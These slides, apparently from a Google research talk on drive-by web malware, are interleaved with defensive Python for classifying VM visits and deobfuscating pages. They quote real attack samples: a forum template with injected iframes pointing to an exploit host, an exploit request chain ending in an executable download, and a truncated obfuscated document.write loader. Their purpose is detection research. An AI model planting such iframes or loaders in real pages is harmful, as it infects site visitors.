The Ghost In The Browser: Analysis of Web-based Malware
Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang, Nagendra Modadugu
Google Inc
Overview
• Introduction
• Detecting Malicious Pages
• Content Control
• Malware Trends
• Conclusion
Introduction
• The Internet is essential to everyday life: e-commerce, etc.
• Malware is used to steal bank accounts or credit cards
• the underground economy is very profitable
• Internet threats are changing:
• remote exploitation and firewalls are yesterday's story
• The browser is a complex computation environment
• Adversaries exploit the browser to install malware
Introduction
• To compromise your browser, we (the adversary) need to compromise your web server
• Very easy to set up a new site on the Internet
• Very difficult to keep a new site secure
• insecure infrastructure: PHP, MySQL, Apache
• insecure web applications: phpBB2, Invision, etc.
Detecting Malicious Websites
• A malicious website automatically installs malware on a visitor's computer
• usually via exploits in the browser or other software on the client, without user consent
• We use Google's infrastructure to analyze several billion URLs.
Detecting Malicious Websites
[Figure: detection pipeline. A web page repository feeds a MapReduce job that performs heuristic URL extraction; each candidate URL is loaded in a virtual machine running Internet Explorer, whose execution is monitored and analyzed; the result for each URL is stored in a malicious page repository.]
Processing Rate
• The VM gets about 300,000 suspicious URLs daily
• About 10,000 to 30,000 are malicious
7
11-01 11-21 12-11 12-31 01-20 02-09 03-01 03-21Time
100
101
102
103
104
105
106
Num
ber o
f URL
s
MaliciousInconclusiveHarmless
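The execution-analysis step on the previous slide ends in the three verdicts plotted above. As an added example (not the authors' code), here is how a verdict could be assigned from what a VM monitor reports; it assumes the monitor records process launches, registry writes and files created while Internet Explorer renders the URL, and the baseline thresholds are illustrative.

```python
"""Classify one monitored VM visit as malicious, inconclusive or harmless.
Added example; the monitored signals and thresholds are assumptions."""
from dataclasses import dataclass, field


@dataclass
class VMRun:
    url: str
    new_processes: list = field(default_factory=list)  # executables launched
    registry_writes: int = 0
    files_created: int = 0


# Churn that rendering any page produces (cache, history); assumed values.
BASELINE_REGISTRY_WRITES = 5
BASELINE_FILES_CREATED = 20


def classify(run: VMRun) -> str:
    """Return 'malicious', 'inconclusive' or 'harmless' for one visit."""
    # A page should never make the browser spawn a process: that is the
    # signature of a successful drive-by install.
    if run.new_processes:
        return "malicious"
    reg_excess = run.registry_writes - BASELINE_REGISTRY_WRITES
    file_excess = run.files_created - BASELINE_FILES_CREATED
    # Abnormal churn without a process launch: the exploit may have failed or
    # targeted software the VM lacks, so the URL needs another look.
    if reg_excess > 0 or file_excess > 0:
        return "inconclusive"
    return "harmless"


def triage(runs):
    """Group URLs by verdict, the per-day breakdown shown on the slide."""
    out = {"malicious": [], "inconclusive": [], "harmless": []}
    for r in runs:
        out[classify(r)].append(r.url)
    return out


if __name__ == "__main__":
    # Constructed sample runs (winus.exe is the binary name from slide 11).
    sample = [
        VMRun("http://ok.example.test/", registry_writes=2, files_created=8),
        VMRun("http://bad.example.test/", new_processes=["winus.exe"], registry_writes=40),
        VMRun("http://odd.example.test/", registry_writes=9, files_created=3),
    ]
    for verdict, urls in triage(sample).items():
        print(verdict, urls)
```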
Content Control
• What constitutes the content of a web page?
• authored content
• user-contributed content
• advertising
• third-party widgets
• ceding control to a third party can be a security risk
Web Server Security
• compromise the web server and change content directly
• many vulnerabilities in web applications, in Apache itself, and stolen passwords
• templating system (example below: iframes injected into an Invision Power Board copyright template, so every rendered page carries them)
<!-- Copyright Information --><div align='center' class='copyright'>Powered by<a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final © 2003 <a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div><iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
Advertising
• by definition means ceding control of content to another party
• web masters have to trust advertisers
• sub-syndication allows delegation of advertising space
• trust is not transitive
[Figure: ad syndication chain. A popular web site (labelled USA) includes advertisement JavaScript from an ads company; the space is sub-syndicated through several further ads companies, each inserting its own JavaScript, and the last hop is an HTTP redirect to an exploit server (labelled Russia).]
Third-Party Widgets
• added to make sites prettier or more useful:
• calendaring or a stats counter
• example: a page found by a search for praying mantis
• it linked to a free stats counter via JavaScript in 2002
• that JavaScript started to compromise users in 2006
Observed request chain from the stats counter:
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe
Malware Trends and Statistics
• Avoiding detection
• obfuscating the exploit code itself
• distributing binaries across different domains
• continuously re-packing the binaries
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D...3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>
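The heuristic URL extraction stage of the pipeline (slide 6) has to see through the `document.write(unescape(...))` wrapper above before it can find the injected iframes of slide 9. As an added example (not the authors' code), the following peels such layers and lists off-site iframe and script sources; it handles only the `unescape("...")` pattern shown on this slide (not `%uXXXX` escapes), and `make_layer` is a constructed helper that builds test input in that shape.

```python
"""Peel document.write(unescape(...)) layers and extract off-site iframe/script
URLs. Added example; regexes are illustrative, the samples are constructed."""
import re
from urllib.parse import quote, unquote, urlsplit

UNESCAPE_RE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
SRC_RE = re.compile(r"""<(?:iframe|script)[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

# The injected template from slide 9 (copyright footer plus two iframes).
SLIDE9_TEMPLATE = (
    "<div align='center' class='copyright'>Powered by "
    '<a href="http://www.invisionboard.com">Invision Power Board</a></div></div>'
    "<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>"
    "<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>"
)


def make_layer(payload: str) -> str:
    """Constructed helper: wrap text the way the slide-12 loader does."""
    return 'document.write(unescape("%s"));' % quote(payload, safe="")


def deobfuscate(html: str, max_layers: int = 5):
    """Replace every unescape("...") literal with its decoded text, repeating
    until no literal is left. Returns (expanded_html, layers_peeled)."""
    layers = 0
    while layers < max_layers:
        # JavaScript unescape() maps %XX to a single Latin-1 character.
        new = UNESCAPE_RE.sub(lambda m: unquote(m.group(1), encoding="latin-1"), html)
        if new == html:
            break
        html, layers = new, layers + 1
    return html, layers


def suspicious_urls(html: str, site_host: str) -> dict:
    """Off-site iframe/script sources plus obfuscation depth: two signals a
    pre-filter can use to decide which URLs to send to the VM."""
    expanded, layers = deobfuscate(html)
    offsite = []
    for src in SRC_RE.findall(expanded):
        host = urlsplit(src).hostname
        if host and host != site_host:
            offsite.append(src)
    return {"offsite": offsite, "layers": layers}


if __name__ == "__main__":
    print(suspicious_urls(make_layer(make_layer(SLIDE9_TEMPLATE)), "forum.example.test"))
```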
Malware Classifications
[Figure: unique URLs discovered per day (log scale, 1 to 100000) from 01-11 to 03-21, by malware classification: adware, unknown, trojan.]
Remotely Linked Exploits
• Exploits are leveraged across many sites
• Popular exploits are linked from over 10,000 URLs
[Figure: two charts over the exploit URLs found (x-axis 0 to 200): the number of URLs linking to each exploit (log scale, 1 to 10000) and the number of hosts linking to each exploit (log scale, 1 to 10000).]
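The two charts above come from aggregating crawler link records per exploit URL. As an added example (not the authors' code), this computes both counts and explains why they differ; the link records are constructed, the exploit URLs are the ones shown on slides 9 and 11, and the referring pages are made up.

```python
"""Aggregate (referring page, exploit URL) records into distinct-URL and
distinct-host counts per exploit. Added example with constructed records."""
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_LINKS = [
    # (referring page, exploit/landing URL it pulls in)
    ("http://forum.example.test/index.php", "http://wsfgfdgrtyhgfd.net/adv/193/new.php"),
    ("http://forum.example.test/viewtopic.php?t=1", "http://wsfgfdgrtyhgfd.net/adv/193/new.php"),
    ("http://mantis.example.test/page.html", "http://expl.info/cgi-bin/ie0606.cgi?homepage"),
    ("http://blog.example.test/", "http://expl.info/cgi-bin/ie0606.cgi?homepage"),
    ("http://stats.example.test/counter.js", "http://expl.info/cgi-bin/ie0606.cgi?homepage"),
]


def link_stats(links):
    """Return {exploit_url: (distinct referring URLs, distinct referring hosts)}.
    Both counts matter: a compromised template (slide 9) makes every page of one
    forum link to the exploit, inflating the URL count but not the host count."""
    urls, hosts = defaultdict(set), defaultdict(set)
    for page, exploit in links:
        urls[exploit].add(page)
        hosts[exploit].add(urlsplit(page).hostname)
    return {e: (len(urls[e]), len(hosts[e])) for e in urls}


def most_linked(stats, n=3):
    """Exploit URLs ranked by distinct hosts first, then distinct URLs."""
    return sorted(stats, key=lambda e: (stats[e][1], stats[e][0]), reverse=True)[:n]


def shared_across_hosts(stats, min_hosts=2):
    """Exploits remotely linked from at least min_hosts different hosts: the
    'leveraged across many sites' case, where cleaning one site is not enough."""
    return [e for e, (_, h) in stats.items() if h >= min_hosts]


if __name__ == "__main__":
    stats = link_stats(SAMPLE_LINKS)
    for exploit in most_linked(stats):
        print(exploit, "urls=%d hosts=%d" % stats[exploit])
    print("shared:", shared_across_hosts(stats))
```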
Discussion
• increase of web-based exploitation over time
• installed malware allows for remote control
• observed botnet-like structures:
• pull-based: the malware frequently checks for new commands
• observed user agents such as DDoSBotLoader
• binary updates can be interpreted as command & control
Conclusion
• Web-based malware is a real problem
• millions of potentially infected users
• Automatic detection of malicious web pages to secure web search results
• Identified four areas of content control
• Observed botnet-like structures